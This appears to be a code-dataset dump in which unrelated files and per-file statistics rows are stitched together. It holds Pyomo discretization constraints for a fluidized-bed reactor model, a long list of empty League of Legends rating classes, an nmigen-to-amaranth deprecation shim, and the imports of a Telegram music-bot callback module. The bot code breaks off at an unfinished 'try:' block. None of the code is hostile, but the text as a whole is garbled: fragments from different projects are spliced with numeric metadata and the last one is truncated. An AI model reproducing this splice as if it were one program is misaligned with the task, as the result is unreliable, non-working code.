def fdvar_x_dTgb_dx_(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dTgbx_dx[it, kt, ix, kx] == \
sum(m.ldot_x[jx, kx] * m.Tgbx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# Continuation in space d2dx2
# dvb_dx
def fcp_x_dvb_dx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.vgx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.vgx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# dcb_dx
def fcp_x_dcb_dx(m, it, kt, ix, c):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.cbx[it, kt, ix + 1, 0, c] == \
sum(m.l1_x[jx] * m.cbx[it, kt, ix, jx, c] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# dTgb_dx
def fcp_x_dTgb_dx(m, it, kt, ix):
if 0 < kt <= m.ncp_t and ix < m.nfe_x:
return m.Tgbx[it, kt, ix + 1, 0] == \
sum(m.l1_x[jx] * m.Tgbx[it, kt, ix, jx] for jx in m.cp_x if jx <= m.ncp_x)
else:
return Constraint.Skip
# tvar
# Time discretization Gb
def fdvar_t_Gb(m, it, kt, ix, kx):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dvg_dt[it, kt, ix, kx] == \
sum(m.ldot_t[jt, kt] * m.vg[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
def fcp_t_Gb(m, it, ix, kx):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.vg[it + 1, 0, ix, kx] - \
sum(m.l1_t[jt] * m.vg[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# gas bubble
def ngb_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Ngb[it, jt, ix, jx, c] == m.delta[it, jt, ix, jx] * m.cb[it, jt, ix, jx, c]
else:
return Constraint.Skip
def hgb_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Hgb[it, jt, ix, jx] == \
m.delta[it, jt, ix, jx] * m.cpg_mol * m.Tgb[it, jt, ix, jx]
else:
return Constraint.Skip
# Momentum balance
def de_Gb_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
# return (m.hi_x[ix] / m.Ax) * m.dGb_dt[it, jt, ix, jx] == \
# -(m.hi_t[it] / m.Ax) * (m.Gb[it, jt, ix, jt] * m.dvg_dx[it, jt, ix, jx] + m.vg[it, jt, ix, jx] * m.dGb_dx[it, jt, ix, jx]) - \
# m.hi_t[it] * m.mug * m.dvgx_dx[it, jt, ix, jx] - \
# m.hi_t[it] * m.dP_dx[it, jt, ix, jx] * 100000 - \
# m.hi_t[it] * m.hi_x[ix] * (1 - m.e[it, jt, ix, jx]) * m.rhos * m.gc
# return m.hi_x[ix] * m.rhog[it, jt, ix, jx] * m.dvg_dt[it, jt, ix, jx] == \
# -m.hi_t[it] * (m.rhog[it, jt, ix, jx] * m.vg[it, jt, ix, jt] * m.dvg_dx[it, jt, ix, jx] ) - \
# m.hi_t[it] * m.mug * m.dvgx_dx[it, jt, ix, jx] - \
# m.hi_t[it] * m.dP_dx[it, jt, ix, jx] * 100000 - \
# m.hi_t[it] * m.hi_x[ix] * (1 - m.e[it, jt, ix, jx]) * m.rhos * m.gc
return 0.0 == -m.dP_dx[it, jt, ix, jx] * 100000 - m.hi_x[ix] * (1 - m.e[it, jt, ix, jx]) * m.rhos * m.gc
else:
return Constraint.Skip
def dum_dex_vg_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dvg_dx[it, jt, ix, jx] == m.hi_x[ix] * m.vgx[it, jt, ix, jx]
else:
return Constraint.Skip
# Continuity (mole balance) species
def de_ngb_rule(m, it, jt, ix, jx, k):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.hi_x[ix] * m.dNgb_dt[it, jt, ix, jx, k] == \
-m.hi_t[it] * (m.vg[it, jt, ix, jx] * m.dcb_dx[it, jt, ix, jx, k] + m.cb[it, jt, ix, jx, k] * m.dvg_dx[it, jt, ix, jx]) - \
m.hi_t[it] * m.D[it, jt, ix, jx, k] * m.dcbx_dx[it, jt, ix, jx, k] - \
m.hi_t[it] * m.hi_x[ix] * m.delta[it, jt, ix, jx] * m.Kbc[it, jt, ix, jx, k] * (m.cb[it, jt, ix, jx, k] - m.cc[it, jt, ix, jx, k]) + \
m.hi_t[it] * m.Kgbulk[it, jt, ix, jx, k]/m.Ax
else:
return Constraint.Skip
def dum_dex_cb_rule(m, it, jt, ix, jx, c):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dcb_dx[it, jt, ix, jx, c] == m.hi_x[ix] * m.cbx[it, jt, ix, jx, c]
else:
return Constraint.Skip
# Energy balance (mole balance)
def de_hgb_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.hi_x[ix] * m.dHgb_dt[it, jt, ix, jx] == \
-(m.hi_t[it] * m.cpg_mol/m.Ax) * (m.Gb[it, jt, ix, jt] * m.dTgb_dx[it, jt, ix, jx] + (m.Tgb[it, jt, ix, jx]) * m.dGb_dx[it, jt, ix, jx]) - \
m.hi_t[it] * m.kg * m.dTgbx_dx[it, jt, ix, jx] - \
m.hi_t[it] * m.hi_x[ix] * m.delta[it, jt, ix, jx] * m.Hbc[it, jt, ix, jx] * (m.Tgb[it, jt, ix, jx] - m.Tgc[it, jt, ix, jx]) + \
m.hi_t[it] * m.Hgbulk[it, jt, ix, jx]/m.Ax
# else:
# return Constraint.Skip
# if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
# return m.hi_x[ix] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.dHgb_dt[it, jt, ix, jx] == \
# -(m.hi_t[it] * m.cpg_mol/m.Ax) * (m.Gb[it, jt, ix, jt] * m.dTgb_dx[it, jt, ix, jx]) - \
# m.hi_t[it] * m.kg * m.dTgbx_dx[it, jt, ix, jx] - \
# m.hi_t[it] * m.hi_x[ix] * m.delta[it, jt, ix, jx] * m.Hbc[it, jt, ix, jx] * (m.Tgb[it, jt, ix, jx] - m.Tgc[it, jt, ix, jx]) + \
# m.hi_t[it] * m.Hgbulk[it, jt, ix, jx]/m.Ax
else:
return Constraint.Skip
def dum_dex_Tgb_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dTgb_dx[it, jt, ix, jx] == m.hi_x[ix] * m.Tgbx[it, jt, ix, jx]
else:
return Constraint.Skip
# Pressure term
def dpdx_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return (m.dP_dx[it, jt, ix, jx]) * 100/8.314 == \
sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.dTgb_dx[it, jt, ix, jx] + \
(m.Tgb[it, jt, ix, jx]) * sum(m.dcb_dx[it, jt, ix, jx, kx] for kx in m.sp)
else:
return Constraint.Skip
# Heat-Exchanger fluid energy balance
# dhxh_dx
def dhxh_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return 0 == (m.HXIn_F / 3600) * m.dhxh_dx[it, jt, ix, jx] - \
m.hi_x[ix] * 1E-6 * m.pi * m.dx * m.ht[it, jt, ix, jx] * m.dThx[it, jt, ix, jx] * m.Nx * m.Cr
else:
return Constraint.Skip
# dPhx_dx
def dphx_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.dPhx_dx[it, jt, ix, jx] == m.hi_x[ix] * m.dPhx + m.hi_x[ix] * m.rhohx * 1E-5
else:
return Constraint.Skip
# Gb0
def bc_Gb0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Gb[it, jt, 1, 0] == m.GasIn_F[it] / 3600
else:
return Constraint.Skip
# Tgb0
def bc_Tgb0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Tgb[it, jt, 1, 0] == m.GasIn_T[it]
else:
return Constraint.Skip
# cb0
def bc_cb0_rule(m, it, jt, k):
if 0 < jt <= m.ncp_t:
return m.cb[it, jt, 1, 0, k] == m.GasIn_z[it, k] * m.GasIn_P[it] * 100 / (8.314 * (m.GasIn_T[it]))
else:
return Constraint.Skip
# P0
def bc_P0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.P[it, jt, 1, 0] == m.GasIn_P[it]
else:
return Constraint.Skip
# vg0
def bc_vg0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.vg[it, jt, 1, 0] == m.GasIn_F[it] / (3600 * m.Ax * m.GasIn_P[it] * 100 / (8.314 * (m.GasIn_T[it])))
else:
return Constraint.Skip
# bcs ddx vars
# vgx_l
def bc_vgx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.vgx[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# cbx_l
def bc_cbx_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.cbx[it, jt, m.nfe_x, jx, c] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# Tgbx_l
def bc_Tgbx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Tgbx[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == 0.0
else:
return Constraint.Skip
# GasOut_F
def e12_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Gb[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == m.GasOut_F[it, jt] / 3600
else:
return Constraint.Skip
# GasOut_T
def e13_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return sum(m.l1_x[jx] * m.Tgb[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) == m.GasOut_T[it, jt]
else:
return Constraint.Skip
# GasOut_z
def e14_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.GasOut_z[it, jt, c] * sum(m.cb_l[it, jt, cx] for cx in m.sp) == m.cb_l[it, jt, c]
else:
return Constraint.Skip
# Sot -- not bc tough
def e20_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Sit[it, jt] - m.Sot[it, jt] == sum(m.l1_x[jx] * m.z[it, jt, m.nfe_x, jx] for jx in m.cp_x if jx <= m.ncp_x) * m.Ax
else:
return Constraint.Skip
# ccwin_l or cein_l
def bc_mol_rule(m, it, jt, j):
if 0 < jt <= m.ncp_t:
return m.ccwin_l[it, jt, j] * m.Ax + m.Sit[it, jt] * m.nin[j] == m.cein_l[it, jt, j] * m.Ax + m.Sot[it, jt] * m.ne_l[it, jt, j]
else:
return Constraint.Skip
# eein_l or eein_l
def bc_ene_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.ecwin_l[it, jt] * m.Ax + m.Sit[it, jt] * m.hsint[it, jt] == m.eein_l[it, jt] * m.Ax + m.Sot[it, jt] * m.hse_l[it, jt]
else:
return Constraint.Skip
# ccwin or cein
def bc_mol0_rule(m, it, jt, c):
if 0 < jt <= m.ncp_t:
return m.ccwin[it, jt, 1, 0, c] == m.cein[it, jt, 1, 0, c]
else:
return Constraint.Skip
# ecwin or eein
def bc_ene0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.ecwin[it, jt, 1, 0] == m.eein[it, jt, 1, 0]
else:
return Constraint.Skip
# z0
def bc_z0_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.z[it, jt, 1, 0] == 0
else:
return Constraint.Skip
# HXIn_h
def bc_hxh_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.hxh_l[it, jt] == m.HXIn_h[it, jt]
else:
return Constraint.Skip
# Phx_l
def bc_phx_rule(m, it, jt):
if 0 < jt <= m.ncp_t:
return m.Phx_l[it, jt] == m.HXIn_P
else:
return Constraint.Skip
def ic_Gb_rule(m, ix, jx):
if 0 < jx <= m.ncp_x:
return m.vg[1, 0, ix, jx] == m.vg_ic[(ix, jx)]
else:
return Constraint.Skip
| 35.523684
| 261
| 0.483814
| 13,530
| 67,495
| 2.326016
| 0.040355
| 0.104604
| 0.137269
| 0.176416
| 0.88116
| 0.853325
| 0.819294
| 0.793302
| 0.746592
| 0.707095
| 0
| 0.038413
| 0.314231
| 67,495
| 1,899
| 262
| 35.542391
| 0.641511
| 0.06033
| 0
| 0.511295
| 0
| 0
| 0.001808
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165663
| false
| 0
| 0.003012
| 0.004518
| 0.49247
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37f2985dc87131d69e6852420f6279afaec8a3b5
| 7,373
|
py
|
Python
|
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_fiddlesticks/na_fiddlesticks_mid.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Fiddlesticks_Mid_Aatrox(Ratings):
pass
class NA_Fiddlesticks_Mid_Ahri(Ratings):
pass
class NA_Fiddlesticks_Mid_Akali(Ratings):
pass
class NA_Fiddlesticks_Mid_Alistar(Ratings):
pass
class NA_Fiddlesticks_Mid_Amumu(Ratings):
pass
class NA_Fiddlesticks_Mid_Anivia(Ratings):
pass
class NA_Fiddlesticks_Mid_Annie(Ratings):
pass
class NA_Fiddlesticks_Mid_Ashe(Ratings):
pass
class NA_Fiddlesticks_Mid_AurelionSol(Ratings):
pass
class NA_Fiddlesticks_Mid_Azir(Ratings):
pass
class NA_Fiddlesticks_Mid_Bard(Ratings):
pass
class NA_Fiddlesticks_Mid_Blitzcrank(Ratings):
pass
class NA_Fiddlesticks_Mid_Brand(Ratings):
pass
class NA_Fiddlesticks_Mid_Braum(Ratings):
pass
class NA_Fiddlesticks_Mid_Caitlyn(Ratings):
pass
class NA_Fiddlesticks_Mid_Camille(Ratings):
pass
class NA_Fiddlesticks_Mid_Cassiopeia(Ratings):
pass
class NA_Fiddlesticks_Mid_Chogath(Ratings):
pass
class NA_Fiddlesticks_Mid_Corki(Ratings):
pass
class NA_Fiddlesticks_Mid_Darius(Ratings):
pass
class NA_Fiddlesticks_Mid_Diana(Ratings):
pass
class NA_Fiddlesticks_Mid_Draven(Ratings):
pass
class NA_Fiddlesticks_Mid_DrMundo(Ratings):
pass
class NA_Fiddlesticks_Mid_Ekko(Ratings):
pass
class NA_Fiddlesticks_Mid_Elise(Ratings):
pass
class NA_Fiddlesticks_Mid_Evelynn(Ratings):
pass
class NA_Fiddlesticks_Mid_Ezreal(Ratings):
pass
class NA_Fiddlesticks_Mid_Fiddlesticks(Ratings):
pass
class NA_Fiddlesticks_Mid_Fiora(Ratings):
pass
class NA_Fiddlesticks_Mid_Fizz(Ratings):
pass
class NA_Fiddlesticks_Mid_Galio(Ratings):
pass
class NA_Fiddlesticks_Mid_Gangplank(Ratings):
pass
class NA_Fiddlesticks_Mid_Garen(Ratings):
pass
class NA_Fiddlesticks_Mid_Gnar(Ratings):
pass
class NA_Fiddlesticks_Mid_Gragas(Ratings):
pass
class NA_Fiddlesticks_Mid_Graves(Ratings):
pass
class NA_Fiddlesticks_Mid_Hecarim(Ratings):
pass
class NA_Fiddlesticks_Mid_Heimerdinger(Ratings):
pass
class NA_Fiddlesticks_Mid_Illaoi(Ratings):
pass
class NA_Fiddlesticks_Mid_Irelia(Ratings):
pass
class NA_Fiddlesticks_Mid_Ivern(Ratings):
pass
class NA_Fiddlesticks_Mid_Janna(Ratings):
pass
class NA_Fiddlesticks_Mid_JarvanIV(Ratings):
pass
class NA_Fiddlesticks_Mid_Jax(Ratings):
pass
class NA_Fiddlesticks_Mid_Jayce(Ratings):
pass
class NA_Fiddlesticks_Mid_Jhin(Ratings):
pass
class NA_Fiddlesticks_Mid_Jinx(Ratings):
pass
class NA_Fiddlesticks_Mid_Kalista(Ratings):
pass
class NA_Fiddlesticks_Mid_Karma(Ratings):
pass
class NA_Fiddlesticks_Mid_Karthus(Ratings):
pass
class NA_Fiddlesticks_Mid_Kassadin(Ratings):
pass
class NA_Fiddlesticks_Mid_Katarina(Ratings):
pass
class NA_Fiddlesticks_Mid_Kayle(Ratings):
pass
class NA_Fiddlesticks_Mid_Kayn(Ratings):
pass
class NA_Fiddlesticks_Mid_Kennen(Ratings):
pass
class NA_Fiddlesticks_Mid_Khazix(Ratings):
pass
class NA_Fiddlesticks_Mid_Kindred(Ratings):
pass
class NA_Fiddlesticks_Mid_Kled(Ratings):
pass
class NA_Fiddlesticks_Mid_KogMaw(Ratings):
pass
class NA_Fiddlesticks_Mid_Leblanc(Ratings):
pass
class NA_Fiddlesticks_Mid_LeeSin(Ratings):
pass
class NA_Fiddlesticks_Mid_Leona(Ratings):
pass
class NA_Fiddlesticks_Mid_Lissandra(Ratings):
pass
class NA_Fiddlesticks_Mid_Lucian(Ratings):
pass
class NA_Fiddlesticks_Mid_Lulu(Ratings):
pass
class NA_Fiddlesticks_Mid_Lux(Ratings):
pass
class NA_Fiddlesticks_Mid_Malphite(Ratings):
pass
class NA_Fiddlesticks_Mid_Malzahar(Ratings):
pass
class NA_Fiddlesticks_Mid_Maokai(Ratings):
pass
class NA_Fiddlesticks_Mid_MasterYi(Ratings):
pass
class NA_Fiddlesticks_Mid_MissFortune(Ratings):
pass
class NA_Fiddlesticks_Mid_MonkeyKing(Ratings):
pass
class NA_Fiddlesticks_Mid_Mordekaiser(Ratings):
pass
class NA_Fiddlesticks_Mid_Morgana(Ratings):
pass
class NA_Fiddlesticks_Mid_Nami(Ratings):
pass
class NA_Fiddlesticks_Mid_Nasus(Ratings):
pass
class NA_Fiddlesticks_Mid_Nautilus(Ratings):
pass
class NA_Fiddlesticks_Mid_Nidalee(Ratings):
pass
class NA_Fiddlesticks_Mid_Nocturne(Ratings):
pass
class NA_Fiddlesticks_Mid_Nunu(Ratings):
pass
class NA_Fiddlesticks_Mid_Olaf(Ratings):
pass
class NA_Fiddlesticks_Mid_Orianna(Ratings):
pass
class NA_Fiddlesticks_Mid_Ornn(Ratings):
pass
class NA_Fiddlesticks_Mid_Pantheon(Ratings):
pass
class NA_Fiddlesticks_Mid_Poppy(Ratings):
pass
class NA_Fiddlesticks_Mid_Quinn(Ratings):
pass
class NA_Fiddlesticks_Mid_Rakan(Ratings):
pass
class NA_Fiddlesticks_Mid_Rammus(Ratings):
pass
class NA_Fiddlesticks_Mid_RekSai(Ratings):
pass
class NA_Fiddlesticks_Mid_Renekton(Ratings):
pass
class NA_Fiddlesticks_Mid_Rengar(Ratings):
pass
class NA_Fiddlesticks_Mid_Riven(Ratings):
pass
class NA_Fiddlesticks_Mid_Rumble(Ratings):
pass
class NA_Fiddlesticks_Mid_Ryze(Ratings):
pass
class NA_Fiddlesticks_Mid_Sejuani(Ratings):
pass
class NA_Fiddlesticks_Mid_Shaco(Ratings):
pass
class NA_Fiddlesticks_Mid_Shen(Ratings):
pass
class NA_Fiddlesticks_Mid_Shyvana(Ratings):
pass
class NA_Fiddlesticks_Mid_Singed(Ratings):
pass
class NA_Fiddlesticks_Mid_Sion(Ratings):
pass
class NA_Fiddlesticks_Mid_Sivir(Ratings):
pass
class NA_Fiddlesticks_Mid_Skarner(Ratings):
pass
class NA_Fiddlesticks_Mid_Sona(Ratings):
pass
class NA_Fiddlesticks_Mid_Soraka(Ratings):
pass
class NA_Fiddlesticks_Mid_Swain(Ratings):
pass
class NA_Fiddlesticks_Mid_Syndra(Ratings):
pass
class NA_Fiddlesticks_Mid_TahmKench(Ratings):
pass
class NA_Fiddlesticks_Mid_Taliyah(Ratings):
pass
class NA_Fiddlesticks_Mid_Talon(Ratings):
pass
class NA_Fiddlesticks_Mid_Taric(Ratings):
pass
class NA_Fiddlesticks_Mid_Teemo(Ratings):
pass
class NA_Fiddlesticks_Mid_Thresh(Ratings):
pass
class NA_Fiddlesticks_Mid_Tristana(Ratings):
pass
class NA_Fiddlesticks_Mid_Trundle(Ratings):
pass
class NA_Fiddlesticks_Mid_Tryndamere(Ratings):
pass
class NA_Fiddlesticks_Mid_TwistedFate(Ratings):
pass
class NA_Fiddlesticks_Mid_Twitch(Ratings):
pass
class NA_Fiddlesticks_Mid_Udyr(Ratings):
pass
class NA_Fiddlesticks_Mid_Urgot(Ratings):
pass
class NA_Fiddlesticks_Mid_Varus(Ratings):
pass
class NA_Fiddlesticks_Mid_Vayne(Ratings):
pass
class NA_Fiddlesticks_Mid_Veigar(Ratings):
pass
class NA_Fiddlesticks_Mid_Velkoz(Ratings):
pass
class NA_Fiddlesticks_Mid_Vi(Ratings):
pass
class NA_Fiddlesticks_Mid_Viktor(Ratings):
pass
class NA_Fiddlesticks_Mid_Vladimir(Ratings):
pass
class NA_Fiddlesticks_Mid_Volibear(Ratings):
pass
class NA_Fiddlesticks_Mid_Warwick(Ratings):
pass
class NA_Fiddlesticks_Mid_Xayah(Ratings):
pass
class NA_Fiddlesticks_Mid_Xerath(Ratings):
pass
class NA_Fiddlesticks_Mid_XinZhao(Ratings):
pass
class NA_Fiddlesticks_Mid_Yasuo(Ratings):
pass
class NA_Fiddlesticks_Mid_Yorick(Ratings):
pass
class NA_Fiddlesticks_Mid_Zac(Ratings):
pass
class NA_Fiddlesticks_Mid_Zed(Ratings):
pass
class NA_Fiddlesticks_Mid_Ziggs(Ratings):
pass
class NA_Fiddlesticks_Mid_Zilean(Ratings):
pass
class NA_Fiddlesticks_Mid_Zyra(Ratings):
pass
| 17.681055
| 49
| 0.792893
| 972
| 7,373
| 5.588477
| 0.151235
| 0.177835
| 0.482695
| 0.55891
| 0.83229
| 0.83229
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150685
| 7,373
| 416
| 50
| 17.723558
| 0.867454
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
5306ac14c5741775af37d169c4026ce82754e8e9
| 259
|
py
|
Python
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/te0714_03_50_2I.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.te0714_03_50_2I import *
from amaranth_boards.te0714_03_50_2I import __all__
import warnings
warnings.warn("instead of nmigen_boards.te0714_03_50_2I, use amaranth_boards.te0714_03_50_2I",
DeprecationWarning, stacklevel=2)
| 32.375
| 94
| 0.818533
| 39
| 259
| 4.923077
| 0.461538
| 0.25
| 0.291667
| 0.333333
| 0.604167
| 0.510417
| 0.375
| 0.375
| 0
| 0
| 0
| 0.163717
| 0.127413
| 259
| 7
| 95
| 37
| 0.685841
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 0.235521
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
728ba80af3290a33bef05998d02e43a8721be80e
| 42,835
|
py
|
Python
|
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | null | null | null |
Yukki/Plugins/callback.py
|
nezukorobot/YUUKI
|
7589acbb7db1e52710ee9fce1bdc6df5cb924be6
|
[
"MIT"
] | 1
|
2021-12-01T10:17:55.000Z
|
2021-12-01T10:17:55.000Z
|
from pyrogram import Client, filters
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
from asyncio import QueueEmpty
from pyrogram import Client, filters
from Yukki import app, BOT_USERNAME, dbb, SUDOERS
import os
import youtube_dl
from youtubesearchpython import VideosSearch
from Yukki.config import LOG_GROUP_ID
from ..YukkiUtilities.tgcallsrun import ASS_ACC
from os import path
import random
import time as sedtime
import asyncio
import shutil
from time import time
import youtube_dl
from .. import converter
import aiohttp
from aiohttp import ClientResponseError, ServerTimeoutError, TooManyRedirects
from Yukki import dbb, app, BOT_USERNAME, BOT_ID, ASSID, ASSNAME, ASSUSERNAME, ASSMENTION
from Yukki.YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done, smexy)
from ..YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.helpers.decorators import errors
from Yukki.YukkiUtilities.helpers.filters import command, other_filters
from Yukki.YukkiUtilities.helpers.paste import paste
from Yukki.YukkiUtilities.tgcallsrun import (yukki, clear, get, is_empty, put, task_done)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.database.playlist import (get_playlist_count, _get_playlists, get_note_names, get_playlist, save_playlist, delete_playlist)
from Yukki.YukkiUtilities.database.assistant import (_get_assistant, get_assistant, save_assistant)
from Yukki.YukkiUtilities.helpers.inline import (play_keyboard, search_markup, play_markup, playlist_markup, audio_markup)
from Yukki.YukkiUtilities.helpers.inline import play_keyboard, confirm_keyboard, play_list_keyboard, close_keyboard, confirm_group_keyboard
from Yukki.YukkiUtilities.tgcallsrun import (yukki, convert, download, clear, get, is_empty, put, task_done, smexy)
from Yukki.YukkiUtilities.database.queue import (is_active_chat, add_active_chat, remove_active_chat, music_on, is_music_playing, music_off)
from Yukki.YukkiUtilities.database.onoff import (is_on_off, add_on, add_off)
from Yukki.YukkiUtilities.database.blacklistchat import (blacklisted_chats, blacklist_chat, whitelist_chat)
from Yukki.YukkiUtilities.database.gbanned import (get_gbans_count, is_gbanned_user, add_gban_user, add_gban_user)
from Yukki.YukkiUtilities.database.theme import (_get_theme, get_theme, save_theme)
from Yukki.YukkiUtilities.database.assistant import (_get_assistant, get_assistant, save_assistant)
from ..config import DURATION_LIMIT, ASS_ID
from ..YukkiUtilities.helpers.decorators import errors
from ..YukkiUtilities.helpers.filters import command
from ..YukkiUtilities.helpers.gets import (get_url, themes, random_assistant, ass_det)
from ..YukkiUtilities.helpers.thumbnails import gen_thumb
from ..YukkiUtilities.helpers.chattitle import CHAT_TITLE
from ..YukkiUtilities.helpers.ytdl import ytdl_opts
from ..YukkiUtilities.helpers.inline import (play_keyboard, search_markup, play_markup, playlist_markup)
import requests
from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaPhoto,
Message,
)
import re
import aiofiles
from pykeyboard import InlineKeyboard
from pyrogram import filters
from Yukki import aiohttpsession as session
pattern = re.compile(
r"^text/|json$|yaml$|xml$|toml$|x-sh$|x-shellscript$"
)
flex = {}
async def isPreviewUp(preview: str) -> bool:
for _ in range(7):
try:
async with session.head(preview, timeout=2) as resp:
status = resp.status
size = resp.content_length
except asyncio.exceptions.TimeoutError:
return False
if status == 404 or (status == 200 and size == 0):
await asyncio.sleep(0.4)
else:
return True if status == 200 else False
return False
@Client.on_callback_query(filters.regex(pattern=r"ppcl"))
async def closesmex(_,CallbackQuery):
callback_data = CallbackQuery.data.strip()
chat_id = CallbackQuery.message.chat.id
callback_request = callback_data.split(None, 1)[1]
userid = CallbackQuery.from_user.id
try:
